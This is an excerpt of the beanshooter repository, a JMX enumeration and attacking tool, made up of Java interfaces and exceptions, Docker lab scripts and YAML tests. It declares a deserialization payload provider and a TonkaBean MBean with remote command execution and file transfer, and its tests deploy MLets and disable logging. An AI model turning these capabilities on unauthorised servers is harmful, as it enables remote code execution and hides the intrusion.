| This folder contains some resources related to *beanshooter* plugins. Several operations of *beanshooter* 6 | can be customized using plugins. Building them is not that straight forward and the documentation is still 7 | work in progress. This folder contains some example plugins as well as a build script to demonstrate the 8 | general plugin structure. The build script will not work for more complex plugins. 9 | -------------------------------------------------------------------------------- /pom.xml: -------------------------------------------------------------------------------- 1 | 2 | 4.0.0 3 | 4 | de.qtc.beanshooter 5 | reactor 6 | reactor 7 | pom 8 | 4.1.0 9 | JMX enumeration and attacking tool 10 | 11 | 12 | tonka-bean 13 | beanshooter 14 | 15 | 16 | -------------------------------------------------------------------------------- /tests/jolokia/basic/tricot.yml: -------------------------------------------------------------------------------- 1 | tester: 2 | title: Jolokia Basic Tests 3 | description: |- 4 | Test the basic beanshooter functionalities using the Jolokia adapter 5 | 6 | id: '15' 7 | groups: 8 | - basic 9 | 10 | testers: 11 | - ./attr/tricot.yml 12 | - ./brute/tricot.yml 13 | - ./deploy/tricot.yml 14 | - ./enum/tricot.yml 15 | - ./info/tricot.yml 16 | - ./invoke/tricot.yml 17 | - ./list/tricot.yml 18 | - ./serial/tricot.yml 19 | -------------------------------------------------------------------------------- /beanshooter/src/de/qtc/beanshooter/exceptions/OpenTypeException.java: -------------------------------------------------------------------------------- 1 | package de.qtc.beanshooter.exceptions; 2 | 3 | /** 4 | * OpenTypeException is thrown when an exception is encountered within a complex OpenType 5 | * format like Composite data. 6 | * 7 | * @author Tobias Neitzel (@qtc_de) 8 | */ 9 | @SuppressWarnings("serial") 10 | public class OpenTypeException extends Exception 11 | { 12 | public OpenTypeException(String string) 13 | { 14 | super(string); 15 | } 16 | } 17 | -------------------------------------------------------------------------------- /beanshooter/src/de/qtc/beanshooter/mbean/INative.java: -------------------------------------------------------------------------------- 1 | package de.qtc.beanshooter.mbean; 2 | 3 | import javax.management.MBeanException; 4 | 5 | /** 6 | * The INative interface contains methods that are supported by each MBean natively. 7 | * It is supposed to be extended by MBean-interfaces that contain specific methods 8 | * for the MBean they are assigned to. 9 | * 10 | * @author Tobias Neitzel (@qtc_de) 11 | */ 12 | public interface INative 13 | { 14 | public Object getAttribute(String name) throws MBeanException; 15 | } 16 | -------------------------------------------------------------------------------- /tests/tomcat-server/recorder/all/tricot.yml: -------------------------------------------------------------------------------- 1 | tester: 2 | title: recorder actions 3 | description: |- 4 | The actions of beanshooters recorder operation all kind of depend 5 | on each other. Performing the tests separately would not make much 6 | sense, as a test for one action would require to also invoke the 7 | other one. Therefore, we use one test module to test all actions 8 | at once. 9 | 10 | id: '09-01' 11 | groups: 12 | - all 13 | 14 | testers: 15 | - ./rmi/tricot.yml 16 | - ./error/tricot.yml 17 | -------------------------------------------------------------------------------- /docker/tomcat/resources/scripts/start.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | IP=$(cat /etc/hosts | tail -n 1 | cut -f1 -d" ") 4 | echo "[+] IP address of the container: ${IP}" 5 | 6 | echo "[+] Adding gateway address to /etc/hosts file..." 7 | GATEWAY="$(echo ${IP} | cut -f4 -d. --complement).1" 8 | echo "$GATEWAY prevent.reverse.dns" >> /etc/hosts 9 | 10 | echo "[+] Preparing /etc/hosts file..." 11 | MOD=$(sed -E "s/(${IP}.+)/\1 iinsecure.example/" /etc/hosts) 12 | echo "${MOD}" > /etc/hosts 13 | echo "127.0.0.1 iinsecure.example" >> /etc/hosts 14 | 15 | echo "[+] Starting tomcat..." 16 | exec catalina.sh run 17 | -------------------------------------------------------------------------------- /beanshooter/src/de/qtc/beanshooter/mbean/mlet/MLetMBean.java: -------------------------------------------------------------------------------- 1 | package de.qtc.beanshooter.mbean.mlet; 2 | 3 | import java.net.URL; 4 | import java.util.Set; 5 | 6 | import javax.management.MBeanException; 7 | 8 | /** 9 | * Interface of available MLet operations. Since we only implement a subset of the 10 | * actually available operations exposed by this MBean, we use a custom interface 11 | * instead of the original one. 12 | * 13 | * @author Tobias Neitzel (@qtc_de) 14 | */ 15 | public interface MLetMBean 16 | { 17 | public Set getMBeansFromURL(URL url) throws MBeanException; 18 | } 19 | -------------------------------------------------------------------------------- /beanshooter/src/de/qtc/beanshooter/plugin/IResponseHandler.java: -------------------------------------------------------------------------------- 1 | package de.qtc.beanshooter.plugin; 2 | 3 | import de.qtc.beanshooter.exceptions.PluginException; 4 | 5 | /** 6 | * The IResponseHandler interface is used during beanshooter's invoke action to handle the return value of an invoked method. 7 | * Implementors are expected to implement the handleResponse method that is called with the return object obtained by the 8 | * server. 9 | * 10 | * @author Tobias Neitzel (@qtc_de) 11 | */ 12 | public interface IResponseHandler 13 | { 14 | void handleResponse(Object responseObject) throws PluginException; 15 | } 16 | -------------------------------------------------------------------------------- /docker/tomcat/resources/conf/tomcat-users.xml: -------------------------------------------------------------------------------- 1 | 2 | 6 | 7 | 8 | 9 | 10 | 11 | -------------------------------------------------------------------------------- /beanshooter/src/de/qtc/beanshooter/plugin/IPayloadProvider.java: -------------------------------------------------------------------------------- 1 | package de.qtc.beanshooter.plugin; 2 | 3 | import de.qtc.beanshooter.cli.Operation; 4 | import de.qtc.beanshooter.exceptions.PluginException; 5 | 6 | /** 7 | * The IPayloadProvider interface is used during beanshooter operations that perform deserialization attacks. 8 | * It is used to obtain the payload object that is send during deserialization attacks. 9 | * 10 | * @author Tobias Neitzel (@qtc_de) 11 | */ 12 | public interface IPayloadProvider 13 | { 14 | Object getPayloadObject(Operation action, String name, String args) throws PluginException; 15 | } 16 | -------------------------------------------------------------------------------- /docker/jolokia/resources/conf/tomcat-users.xml: -------------------------------------------------------------------------------- 1 | 2 | 6 | 7 | 8 | 9 | 10 | 11 | -------------------------------------------------------------------------------- /beanshooter/src/de/qtc/beanshooter/exceptions/SaslMissingException.java: -------------------------------------------------------------------------------- 1 | package de.qtc.beanshooter.exceptions; 2 | 3 | /** 4 | * SaslProfileExceptions occur when the client specified SASL profile does not match 5 | * the server specified one. 6 | * 7 | * @author Tobias Neitzel (@qtc_de) 8 | */ 9 | public class SaslMissingException extends SaslProfileException { 10 | 11 | private static final long serialVersionUID = 1L; 12 | 13 | public SaslMissingException(Exception e) 14 | { 15 | super(e, false); 16 | } 17 | 18 | public SaslMissingException(Exception e, boolean showDetails) 19 | { 20 | super(e, showDetails); 21 | } 22 | } 23 | -------------------------------------------------------------------------------- /beanshooter/src/de/qtc/beanshooter/exceptions/SaslProfileException.java: -------------------------------------------------------------------------------- 1 | package de.qtc.beanshooter.exceptions; 2 | 3 | /** 4 | * SaslProfileExceptions occur when the client specified SASL profile does not match 5 | * the server specified one. 6 | * 7 | * @author Tobias Neitzel (@qtc_de) 8 | */ 9 | public class SaslProfileException extends AuthenticationException { 10 | 11 | private static final long serialVersionUID = 1L; 12 | 13 | public SaslProfileException(Exception e) 14 | { 15 | super(e, false); 16 | } 17 | 18 | public SaslProfileException(Exception e, boolean showDetails) 19 | { 20 | super(e, showDetails); 21 | } 22 | } 23 | -------------------------------------------------------------------------------- /beanshooter/src/de/qtc/beanshooter/exceptions/ApacheKarafException.java: -------------------------------------------------------------------------------- 1 | package de.qtc.beanshooter.exceptions; 2 | 3 | /** 4 | * The ApacheKarafException is thrown when Apache Karaf specific error messages 5 | * are observed during a login attempt. 6 | * 7 | * @author Tobias Neitzel (@qtc_de) 8 | */ 9 | public class ApacheKarafException extends AuthenticationException { 10 | 11 | private static final long serialVersionUID = 1L; 12 | 13 | public ApacheKarafException(Exception e) 14 | { 15 | super(e, false); 16 | } 17 | 18 | public ApacheKarafException(Exception e, boolean showDetails) 19 | { 20 | super(e, showDetails); 21 | } 22 | } 23 | -------------------------------------------------------------------------------- /beanshooter/src/de/qtc/beanshooter/exceptions/WrongCredentialsException.java: -------------------------------------------------------------------------------- 1 | package de.qtc.beanshooter.exceptions; 2 | 3 | /** 4 | * WrongCredentialExceptions are raised when beanshooter attempts a login with wrong 5 | * credentials. 6 | * 7 | * @author Tobias Neitzel (@qtc_de) 8 | */ 9 | public class WrongCredentialsException extends AuthenticationException { 10 | 11 | private static final long serialVersionUID = 1L; 12 | 13 | public WrongCredentialsException(Exception e) 14 | { 15 | super(e, false); 16 | } 17 | 18 | public WrongCredentialsException(Exception e, boolean showDetails) 19 | { 20 | super(e, showDetails); 21 | } 22 | } 23 | -------------------------------------------------------------------------------- /beanshooter/src/de/qtc/beanshooter/exceptions/SaslSuperflousException.java: -------------------------------------------------------------------------------- 1 | package de.qtc.beanshooter.exceptions; 2 | 3 | /** 4 | * SaslProfileExceptions occur when the client specified SASL profile does not match 5 | * the server specified one. 6 | * 7 | * @author Tobias Neitzel (@qtc_de) 8 | */ 9 | public class SaslSuperflousException extends SaslProfileException { 10 | 11 | private static final long serialVersionUID = 1L; 12 | 13 | public SaslSuperflousException(Exception e) 14 | { 15 | super(e, false); 16 | } 17 | 18 | public SaslSuperflousException(Exception e, boolean showDetails) 19 | { 20 | super(e, showDetails); 21 | } 22 | } 23 | -------------------------------------------------------------------------------- /docker/jmx-example-server/resources/scripts/start.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | IP=$(ip a | grep inet | grep -v 127.0.0.1 | grep -o "\([0-9]\{1,3\}\.\?\)\{4\}" | head -n 1) 4 | echo "[+] IP address of the container: ${IP}" 5 | 6 | echo "[+] Adding gateway address to /etc/hosts file..." 7 | GATEWAY=$(ip r | grep "default via" | cut -d" " -f 3) 8 | echo "$GATEWAY prevent.reverse.dns" >> /etc/hosts 9 | 10 | echo "[+] Preparing /etc/hosts file..." 11 | MOD=$(sed -E "s/${IP}.+/${IP} iinsecure.example/" /etc/hosts) 12 | echo "${MOD}" > /etc/hosts 13 | echo "127.0.0.1 iinsecure.example" >> /etc/hosts 14 | 15 | echo "[+] Starting rmi server..." 16 | exec /usr/bin/java -jar /opt/jmx-example-server.jar 17 | -------------------------------------------------------------------------------- /tests/jolokia/diagnostic/props/tricot.yml: -------------------------------------------------------------------------------- 1 | tester: 2 | title: diagnostic props action 3 | description: |- 4 | Perform tests on beanshooters diagnostic props action 5 | 6 | id: '11-02' 7 | groups: 8 | - props 9 | id_pattern: '11-02-{:02}' 10 | 11 | tests: 12 | - title: Get props 13 | description: |- 14 | Obtain currently set system properties 15 | 16 | command: 17 | - beanshooter 18 | - diagnostic 19 | - props 20 | - ${TARGET} 21 | - ${OPTIONS} 22 | 23 | validators: 24 | - error: False 25 | - contains: 26 | values: 27 | - 'os.name=Linux' 28 | - 'user.dir=/usr/local/tomcat' 29 | -------------------------------------------------------------------------------- /beanshooter/src/de/qtc/beanshooter/mbean/IMBean.java: -------------------------------------------------------------------------------- 1 | package de.qtc.beanshooter.mbean; 2 | 3 | import javax.management.ObjectName; 4 | 5 | /** 6 | * To perform operations on an MBean, the corresponding bean needs to be wrapped inside 7 | * a class that implements the IMBean interface. This can either be a member of the MBean 8 | * enum (default MBean classes) or an instance of the DynamicMBean class (command line 9 | * specified MBean). 10 | * 11 | * @author Tobias Neitzel (@qtc_de) 12 | */ 13 | public interface IMBean 14 | { 15 | public ObjectName getObjectName(); 16 | public String getMBeanClass(); 17 | public String getJarName(); 18 | public String getName(); 19 | } 20 | -------------------------------------------------------------------------------- /beanshooter/src/de/qtc/beanshooter/exceptions/UnknownSecurityException.java: -------------------------------------------------------------------------------- 1 | package de.qtc.beanshooter.exceptions; 2 | 3 | /** 4 | * UnknownSecurityException is raised when beanshooter obtains an unknown 5 | * SecurityException during the connection setup. 6 | * 7 | * @author Tobias Neitzel (@qtc_de) 8 | */ 9 | public class UnknownSecurityException extends AuthenticationException { 10 | 11 | private static final long serialVersionUID = 1L; 12 | 13 | public UnknownSecurityException(Exception e) 14 | { 15 | super(e, false); 16 | } 17 | 18 | public UnknownSecurityException(Exception e, boolean showDetails) 19 | { 20 | super(e, showDetails); 21 | } 22 | } 23 | -------------------------------------------------------------------------------- /beanshooter/src/de/qtc/beanshooter/exceptions/LoginClassCastException.java: -------------------------------------------------------------------------------- 1 | package de.qtc.beanshooter.exceptions; 2 | 3 | /** 4 | * LoginClassCastException occur when the JMX server attempts to deserialize a 5 | * deserialization payload during the login attempt. 6 | * 7 | * @author Tobias Neitzel (@qtc_de) 8 | */ 9 | public class LoginClassCastException extends AuthenticationException { 10 | 11 | private static final long serialVersionUID = 1L; 12 | 13 | public LoginClassCastException(Exception e) 14 | { 15 | super(e, false); 16 | } 17 | 18 | public LoginClassCastException(Exception e, boolean showDetails) 19 | { 20 | super(e, showDetails); 21 | } 22 | } 23 | -------------------------------------------------------------------------------- /tests/tomcat-server/mlet/status/tricot.yml: -------------------------------------------------------------------------------- 1 | tester: 2 | title: mlet status action 3 | description: |- 4 | Perform tests on beanshooters mlet status action 5 | 6 | id: '07-01' 7 | groups: 8 | - status 9 | 10 | tests: 11 | - title: Undeploy if deployed 12 | description: |- 13 | Undeploy the mlet MBean if it was already deployed 14 | 15 | command: 16 | - beanshooter 17 | - mlet 18 | - undeploy 19 | - ${TARGET} 20 | - ${OPTIONS} 21 | 22 | validators: 23 | - error: False 24 | - regex: 25 | match: 26 | - 'MBean (was successfully removed|is not registered. Nothing to do)' 27 | 28 | testers: 29 | - ./rmi/tricot.yml 30 | -------------------------------------------------------------------------------- /tests/tomcat-server/diagnostic/nolog/rmi/tricot.yml: -------------------------------------------------------------------------------- 1 | tester: 2 | title: diagnostic nolog action (RMI) 3 | description: |- 4 | Perform tests on beanshooters diagnostic nolog action for RMI based connections 5 | 6 | id: '06-04-01' 7 | groups: 8 | - rmi 9 | id_pattern: '06-04-01-{:02}' 10 | 11 | 12 | tests: 13 | - title: Disable logging 14 | description: |- 15 | Disable logging by using the nolog action 16 | 17 | command: 18 | - beanshooter 19 | - diagnostic 20 | - nolog 21 | - ${TARGET} 22 | - ${OPTIONS} 23 | 24 | validators: 25 | - error: False 26 | - contains: 27 | values: 28 | - 'Logging was disabled successfully' 29 | -------------------------------------------------------------------------------- /tests/jolokia/tomcat/list/error/tricot.yml: -------------------------------------------------------------------------------- 1 | tester: 2 | title: tomcat list action (Error) 3 | description: |- 4 | Perform tests on the error handling of beanshooters tomcat list action 5 | 6 | id: '10-06-02' 7 | groups: 8 | - error 9 | id_pattern: '10-06-02-{:02}' 10 | 11 | tests: 12 | - title: Undeploy UserMemoryDatabaseBean 13 | description: |- 14 | Undeploy the MBean that is used for listing the users 15 | 16 | command: 17 | - beanshooter 18 | - tomcat 19 | - undeploy 20 | - ${TARGET} 21 | - ${OPTIONS} 22 | 23 | validators: 24 | - error: True 25 | - contains: 26 | values: 27 | - 'Removing MBeans is not supported by Jolokia' 28 | -------------------------------------------------------------------------------- /tonka-bean/src/de/qtc/beanshooter/tonkabean/TonkaBeanMBean.java: -------------------------------------------------------------------------------- 1 | package de.qtc.beanshooter.tonkabean; 2 | 3 | import java.io.IOException; 4 | import java.nio.file.InvalidPathException; 5 | 6 | public interface TonkaBeanMBean 7 | { 8 | public String version(); 9 | public String[] shellInit(); 10 | public String toServerDir(String current, String change) throws IOException, InvalidPathException; 11 | public byte[] downloadFile(String filename) throws IOException; 12 | public String uploadFile(String destination, String filename, byte[] content) throws IOException; 13 | public byte[] executeCommand(String[] cmd, String cwd, String[] env, boolean background) throws IOException, InterruptedException; 14 | } 15 | -------------------------------------------------------------------------------- /beanshooter/src/de/qtc/beanshooter/exceptions/MissingCredentialsException.java: -------------------------------------------------------------------------------- 1 | package de.qtc.beanshooter.exceptions; 2 | 3 | /** 4 | * MissingCredentialsExceptions are raised when beanshooter attempts a login without 5 | * credentials, but the server requires authentication. 6 | * 7 | * @author Tobias Neitzel (@qtc_de) 8 | */ 9 | public class MissingCredentialsException extends AuthenticationException { 10 | 11 | private static final long serialVersionUID = 1L; 12 | 13 | public MissingCredentialsException(Exception e) 14 | { 15 | super(e, false); 16 | } 17 | 18 | public MissingCredentialsException(Exception e, boolean showDetails) 19 | { 20 | super(e, showDetails); 21 | } 22 | } 23 | -------------------------------------------------------------------------------- /beanshooter/src/de/qtc/beanshooter/exceptions/InvalidLoginClassException.java: -------------------------------------------------------------------------------- 1 | package de.qtc.beanshooter.exceptions; 2 | 3 | /** 4 | * InvalidLoginClassException occur when a deserilization payload was used during a login attempt 5 | * and the server rejected the invalid login class. 6 | * 7 | * @author Tobias Neitzel (@qtc_de) 8 | */ 9 | public class InvalidLoginClassException extends AuthenticationException { 10 | 11 | private static final long serialVersionUID = 1L; 12 | 13 | public InvalidLoginClassException(Exception e) 14 | { 15 | super(e, false); 16 | } 17 | 18 | public InvalidLoginClassException(Exception e, boolean showDetails) 19 | { 20 | super(e, showDetails); 21 | } 22 | } 23 | -------------------------------------------------------------------------------- /tests/tomcat-server/diagnostic/props/rmi/tricot.yml: -------------------------------------------------------------------------------- 1 | tester: 2 | title: diagnostic props action (RMI) 3 | description: |- 4 | Perform tests on beanshooters diagnostic props action for RMI based connections 5 | 6 | id: '06-06-01' 7 | groups: 8 | - rmi 9 | id_pattern: '06-06-01-{:02}' 10 | 11 | 12 | tests: 13 | - title: Get props 14 | description: |- 15 | Obtain currently set system properties 16 | 17 | command: 18 | - beanshooter 19 | - diagnostic 20 | - props 21 | - ${TARGET} 22 | - ${OPTIONS} 23 | 24 | validators: 25 | - error: False 26 | - contains: 27 | values: 28 | - 'os.name=Linux' 29 | - 'user.dir=/usr/local/tomcat' 30 | -------------------------------------------------------------------------------- /tests/jolokia/hotspot/get/error/tricot.yml: -------------------------------------------------------------------------------- 1 | tester: 2 | title: hotspot get action (Error) 3 | description: |- 4 | Perform tests for the error handling of beanshooters hotspot get action. 5 | 6 | id: '13-03-02' 7 | groups: 8 | - error 9 | id_pattern: '13-03-02-{:02}' 10 | 11 | tests: 12 | - title: Non existent 13 | description: |- 14 | Attempt to get information on non existent option 15 | 16 | command: 17 | - beanshooter 18 | - hotspot 19 | - get 20 | - ${TARGET} 21 | - ${OPTIONS} 22 | - test 23 | 24 | validators: 25 | - error: False 26 | - contains: 27 | values: 28 | - 'A VMOption with name test does not exist on the remote server' 29 | -------------------------------------------------------------------------------- /tests/tomcat-server/hotspot/get/error/tricot.yml: -------------------------------------------------------------------------------- 1 | tester: 2 | title: hotspot get action (Error) 3 | description: |- 4 | Perform tests for the error handling of beanshooters hotspot get action. 5 | 6 | id: '08-03-02' 7 | groups: 8 | - rmi 9 | id_pattern: '08-03-02-{:02}' 10 | 11 | tests: 12 | - title: Non existent 13 | description: |- 14 | Attempt to get information on non existent option 15 | 16 | command: 17 | - beanshooter 18 | - hotspot 19 | - get 20 | - ${TARGET} 21 | - ${OPTIONS} 22 | - test 23 | 24 | validators: 25 | - error: False 26 | - contains: 27 | values: 28 | - 'A VMOption with name test does not exist on the remote server.' 29 | -------------------------------------------------------------------------------- /tests/jmx-example-server-2/mlet/status/tricot.yml: -------------------------------------------------------------------------------- 1 | tester: 2 | title: mlet status action 3 | description: |- 4 | Perform tests on beanshooters mlet status action 5 | 6 | id: '04-01' 7 | groups: 8 | - status 9 | 10 | tests: 11 | - title: Undeploy if deployed 12 | description: |- 13 | Undeploy the mlet MBean if it was already deployed 14 | 15 | command: 16 | - beanshooter 17 | - mlet 18 | - undeploy 19 | - ${TARGET_UNAUTH} 20 | - ${OPTIONS} 21 | 22 | validators: 23 | - error: False 24 | - regex: 25 | match: 26 | - 'MBean (was successfully removed|is not registered. Nothing to do)' 27 | 28 | testers: 29 | - ./rmi/tricot.yml 30 | - ./jmxmp/tricot.yml 31 | -------------------------------------------------------------------------------- /tests/tomcat-server/diagnostic/load/rmi/tricot.yml: -------------------------------------------------------------------------------- 1 | tester: 2 | title: diagnostic load action (RMI) 3 | description: |- 4 | Perform tests on beanshooters diagnostic load action 5 | 6 | id: '06-02-01' 7 | groups: 8 | - rmi 9 | id_pattern: '06-02-01-{:02}' 10 | 11 | 12 | tests: 13 | - title: Load a shared library 14 | description: |- 15 | Attempt to load an existing shared library 16 | 17 | command: 18 | - beanshooter 19 | - diagnostic 20 | - load 21 | - ${TARGET} 22 | - ${OPTIONS} 23 | - /lib/x86_64-linux-gnu/libc.so.6 24 | 25 | validators: 26 | - error: False 27 | - contains: 28 | values: 29 | - 'The specified library was loaded succesfully' 30 | -------------------------------------------------------------------------------- /tests/tomcat-server/mlet/load/tricot.yml: -------------------------------------------------------------------------------- 1 | tester: 2 | title: mlet load action 3 | description: |- 4 | Perform tests on beanshooters mlet load action 5 | 6 | id: '07-02' 7 | groups: 8 | - load 9 | 10 | 11 | tests: 12 | - title: Deploy if not deployed 13 | description: |- 14 | Deploy the mlet bean if it was not already deployed 15 | 16 | command: 17 | - beanshooter 18 | - mlet 19 | - deploy 20 | - ${TARGET} 21 | - ${OPTIONS} 22 | 23 | validators: 24 | - error: False 25 | - regex: 26 | match: 27 | - 'MBean with object name DefaultDomain:type=MLet (is already|was successfully) deployed' 28 | 29 | testers: 30 | - ./error/tricot.yml 31 | - ./rmi/tricot.yml 32 | -------------------------------------------------------------------------------- /beanshooter/src/de/qtc/beanshooter/exceptions/MalformedPluginException.java: -------------------------------------------------------------------------------- 1 | package de.qtc.beanshooter.exceptions; 2 | 3 | /** 4 | * MalformedPluginExceptions are thrown when a beanshooter plugin was specified on the command 5 | * line that does not satisfy the plugin requirements. Usually that happens then the 6 | * Manifest of the corresponding plugin does not contain a reference to the beanshooter plugin 7 | * class. 8 | * 9 | * @author Tobias Neitzel (@qtc_de) 10 | */ 11 | public class MalformedPluginException extends Exception { 12 | 13 | private static final long serialVersionUID = 1L; 14 | 15 | public MalformedPluginException() {} 16 | 17 | public MalformedPluginException(String message) { 18 | super(message); 19 | } 20 | } 21 | -------------------------------------------------------------------------------- /beanshooter/src/de/qtc/beanshooter/mbean/tomcat/UserMBean.java: -------------------------------------------------------------------------------- 1 | package de.qtc.beanshooter.mbean.tomcat; 2 | 3 | import javax.management.MBeanException; 4 | 5 | import de.qtc.beanshooter.mbean.INative; 6 | 7 | /** 8 | * Tomcat creates a separate UserMBean for each registered user. This interface 9 | * contains the methods that are available on the corresponding MBean. They are 10 | * currently not implemented, but we may use them in future. 11 | * 12 | * @author Tobias Neitzel (@qtc_de) 13 | */ 14 | public interface UserMBean extends INative 15 | { 16 | public void addGroup(String groupname) throws MBeanException; 17 | public void removeGroup(String groupname) throws MBeanException; 18 | public void removeRole(String rolename) throws MBeanException; 19 | } 20 | -------------------------------------------------------------------------------- /tests/tomcat-server/diagnostic/cmdline/rmi/tricot.yml: -------------------------------------------------------------------------------- 1 | tester: 2 | title: diagnostic nolog action (RMI) 3 | description: |- 4 | Perform tests on beanshooters diagnostic cmdline action for RMI based connections 5 | 6 | id: '06-05-01' 7 | groups: 8 | - rmi 9 | id_pattern: '06-05-01-{:02}' 10 | 11 | 12 | tests: 13 | - title: Get cmdline 14 | description: |- 15 | Obtain the servers cmdline 16 | 17 | command: 18 | - beanshooter 19 | - diagnostic 20 | - cmdline 21 | - ${TARGET} 22 | - ${OPTIONS} 23 | 24 | validators: 25 | - error: False 26 | - contains: 27 | values: 28 | - 'VM Arguments' 29 | - '-Dcom.sun.management.jmxremote.port=1090 -Dcom.sun.management.jmxremote.rmi.port=1099' 30 | -------------------------------------------------------------------------------- /tests/jmx-example-server-2/mlet/load/tricot.yml: -------------------------------------------------------------------------------- 1 | tester: 2 | title: mlet load action 3 | description: |- 4 | Perform tests on beanshooters mlet load action 5 | 6 | id: '04-02' 7 | groups: 8 | - load 9 | 10 | 11 | tests: 12 | - title: Deploy if not deployed 13 | description: |- 14 | Deploy the mlet bean if it was not already deployed 15 | 16 | command: 17 | - beanshooter 18 | - mlet 19 | - deploy 20 | - ${TARGET_UNAUTH} 21 | - ${OPTIONS} 22 | 23 | validators: 24 | - error: False 25 | - regex: 26 | match: 27 | - 'MBean with object name DefaultDomain:type=MLet (is already|was successfully) deployed' 28 | 29 | testers: 30 | - ./error/tricot.yml 31 | - ./rmi/tricot.yml 32 | - ./jmxmp/tricot.yml 33 | -------------------------------------------------------------------------------- /tests/jmx-example-server-2/tonka/version/rmi/tricot.yml: -------------------------------------------------------------------------------- 1 | tester: 2 | title: tonka version action (RMI) 3 | description: |- 4 | Perform tests on beanshooters tonka version action for RMI based connections 5 | 6 | id: '03-02-01' 7 | groups: 8 | - rmi 9 | id_pattern: '03-02-01-{:02}' 10 | 11 | 12 | tests: 13 | - title: Plain version call 14 | description: |- 15 | Call the version function on the tonka bean 16 | 17 | command: 18 | - beanshooter 19 | - tonka 20 | - version 21 | - ${TARGET_PLAIN} 22 | - ${OPTIONS} 23 | - --username 24 | - admin 25 | - --password 26 | - admin 27 | 28 | validators: 29 | - error: False 30 | - regex: 31 | match: 32 | - 'TonkaBean v.+ on Java v.+' 33 | -------------------------------------------------------------------------------- /tests/jolokia/hotspot/get/tricot.yml: -------------------------------------------------------------------------------- 1 | tester: 2 | title: hotspot get action 3 | description: |- 4 | Perform tests on beanshooters hotspot get action 5 | 6 | id: '13-03' 7 | groups: 8 | - get 9 | id_pattern: '13-03-01-{:02}' 10 | 11 | tests: 12 | - title: Get option 13 | description: |- 14 | Attempt to get a diagnostic option value 15 | 16 | command: 17 | - beanshooter 18 | - hotspot 19 | - get 20 | - ${TARGET} 21 | - ${OPTIONS} 22 | - HeapDumpBeforeFullGC 23 | 24 | validators: 25 | - error: False 26 | - contains: 27 | values: 28 | - '[+] Name: HeapDumpBeforeFullGC' 29 | - '[+] Value: false' 30 | - '[+] Writable: true' 31 | 32 | testers: 33 | - ./error/tricot.yml 34 | -------------------------------------------------------------------------------- /tests/tomcat-server/hotspot/get/rmi/tricot.yml: -------------------------------------------------------------------------------- 1 | tester: 2 | title: hotspot get action (RMI) 3 | description: |- 4 | Perform tests on beanshooters hotspot get action for RMI based connections 5 | 6 | id: '08-03-01' 7 | groups: 8 | - rmi 9 | id_pattern: '08-03-01-{:02}' 10 | 11 | tests: 12 | - title: Get option 13 | description: |- 14 | Attempt to get a diagnostic option value 15 | 16 | command: 17 | - beanshooter 18 | - hotspot 19 | - get 20 | - ${TARGET} 21 | - ${OPTIONS} 22 | - HeapDumpBeforeFullGC 23 | 24 | validators: 25 | - error: False 26 | - contains: 27 | values: 28 | - '[+] Name: HeapDumpBeforeFullGC' 29 | - '[+] Value: false' 30 | - '[+] Writable: true' 31 | -------------------------------------------------------------------------------- /tests/tomcat-server/hotspot/list/rmi/tricot.yml: -------------------------------------------------------------------------------- 1 | tester: 2 | title: hotspot list action (RMI) 3 | description: |- 4 | Perform tests on beanshooters hotspot list action for RMI based connections 5 | 6 | id: '08-02-01' 7 | groups: 8 | - rmi 9 | id_pattern: '08-02-01-{:02}' 10 | 11 | tests: 12 | - title: List available options 13 | description: |- 14 | List available diagnostic options 15 | 16 | command: 17 | - beanshooter 18 | - hotspot 19 | - list 20 | - ${TARGET} 21 | - ${OPTIONS} 22 | 23 | validators: 24 | - error: False 25 | - contains: 26 | values: 27 | - 'HeapDumpBeforeFullGC (value = false, writable = true)' 28 | - 'G1PeriodicGCSystemLoadThreshold (value = 0.0, writable = true)' 29 | -------------------------------------------------------------------------------- /tests/jolokia/hotspot/list/tricot.yml: -------------------------------------------------------------------------------- 1 | tester: 2 | title: hotspot list action 3 | description: |- 4 | Perform tests on beanshooters hotspot list action 5 | 6 | id: '13-02' 7 | groups: 8 | - list 9 | id_pattern: '13-02-{:02}' 10 | 11 | tests: 12 | - title: List available options 13 | description: |- 14 | List available diagnostic options 15 | 16 | command: 17 | - beanshooter 18 | - hotspot 19 | - list 20 | - ${TARGET} 21 | - ${OPTIONS} 22 | 23 | validators: 24 | - error: False 25 | - contains: 26 | values: 27 | - 'MinHeapFreeRatio (value = 0, writable = true)' 28 | - 'MaxHeapFreeRatio (value = 100, writable = true)' 29 | - 'PrintConcurrentLocks (value = false, writable = true)' 30 | -------------------------------------------------------------------------------- /beanshooter/src/de/qtc/beanshooter/exceptions/PluginException.java: -------------------------------------------------------------------------------- 1 | package de.qtc.beanshooter.exceptions; 2 | 3 | /** 4 | * Can be raised by plugins. Beanshooter always aborts upon encountering such an exception. 5 | * 6 | * @author Tobias Neitzel (@qtc_de) 7 | */ 8 | public class PluginException extends Exception 9 | { 10 | private static final long serialVersionUID = 1L; 11 | protected final Exception origException; 12 | 13 | public PluginException() 14 | { 15 | this(null, null); 16 | } 17 | 18 | public PluginException(String message) 19 | { 20 | this(message, null); 21 | } 22 | 23 | public PluginException(String message, Exception e) 24 | { 25 | super(message); 26 | origException = e; 27 | } 28 | } 29 | -------------------------------------------------------------------------------- /tests/jmx-example-server-2/tonka/undeploy/rmi/tricot.yml: -------------------------------------------------------------------------------- 1 | tester: 2 | title: tonka undeploy action (RMI) 3 | description: |- 4 | Perform tests on beanshooters tonka undeploy action for RMI based connections 5 | 6 | id: '03-08-01' 7 | groups: 8 | - rmi 9 | id_pattern: '03-08-01-{:02}' 10 | 11 | 12 | tests: 13 | - title: Undeploy Tonka 14 | description: |- 15 | Undeploy the tonka bean 16 | 17 | command: 18 | - beanshooter 19 | - tonka 20 | - undeploy 21 | - ${TARGET_UNAUTH} 22 | - ${OPTIONS} 23 | 24 | validators: 25 | - error: False 26 | - contains: 27 | values: 28 | - 'Removing MBean with ObjectName MLetTonkaBean:name=TonkaBean,id=1 from the MBeanServer' 29 | - 'MBean was successfully removed' 30 | -------------------------------------------------------------------------------- /plugins/build.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # This build script only works for simple plugins that consist out of a single file. 4 | # It is just an example to demonstrate the general plugin structure. 5 | 6 | if [[ $# -lt 3 ]]; then 7 | echo "${0} " 8 | exit 1 9 | fi 10 | 11 | set -e 12 | 13 | TEMP=$(mktemp -d) 14 | SOURCE="${TEMP}/${2}" 15 | COMPILED="${TEMP}/comp/" 16 | MANIFEST="${TEMP}/MANIFEST.MF" 17 | 18 | mkdir "${COMPILED}" 19 | cp "${2}" "${SOURCE}" 20 | 21 | 